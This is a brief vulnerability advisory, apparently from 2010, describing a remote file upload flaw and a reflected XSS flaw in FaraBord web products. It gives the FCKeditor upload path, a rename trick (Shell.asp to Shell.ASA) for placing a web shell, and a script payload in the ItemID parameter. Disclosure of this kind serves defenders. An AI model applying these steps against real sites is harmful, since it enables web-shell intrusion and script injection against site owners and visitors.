FaraBord All Product's Multiple Remote Vulnerabilities

2010.06.15
Credit: Securitylab.ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#### # Securitylab.ir #### # Application Info: # Name: FaraBord Product's # Vendor: http://farabord.com #### # Vulnerability Info: # Type: Remote Arbitrary File Upload,XSS # Risk: High #### [Remote File Upload]: http://site.ir/fckeditor/editor/filemanager/upload/test.html Shell.asp > renamed shell > Shell.ASA Uploaded Here: http://site.ir//files/filebox/Shell.asa [XSS]: http://site.ir/VisitorPages/show.aspx?IsDetailList=true&ItemID=%3Cscript%3E%28/xss/%29%3C/script%3E #### # Vulnerable Products: All Products #### # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: info[AT]Securitylab[Dot]ir,whh_iran[AT]yahoo[Dot]com ######


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top